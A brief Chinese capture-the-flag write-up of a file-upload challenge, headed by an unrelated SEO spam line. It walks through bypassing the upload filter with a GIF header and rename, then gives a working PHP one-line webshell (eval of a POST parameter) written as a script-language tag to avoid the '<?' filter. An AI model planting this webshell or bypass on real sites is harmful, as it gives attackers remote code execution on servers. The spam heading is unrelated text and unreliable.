網(wǎng)站制作技巧南京百度快速排名優(yōu)化
直接上傳php一句話木馬,提示要上傳image
把文件名改成gif并加上gif文件頭后,繞過了對(duì)image類型的檢測(cè),但是提示文件內(nèi)含有<?,且bp抓包后改回php也會(huì)被檢測(cè)
?
?
那我們考慮使用js執(zhí)行php代碼
<script language='php'>eval($_POST['cmd']);</script>
這樣就可以繞過<?
猜測(cè)上傳目錄為./upload,猜測(cè)正確
在根目錄下找到了flag?
?
?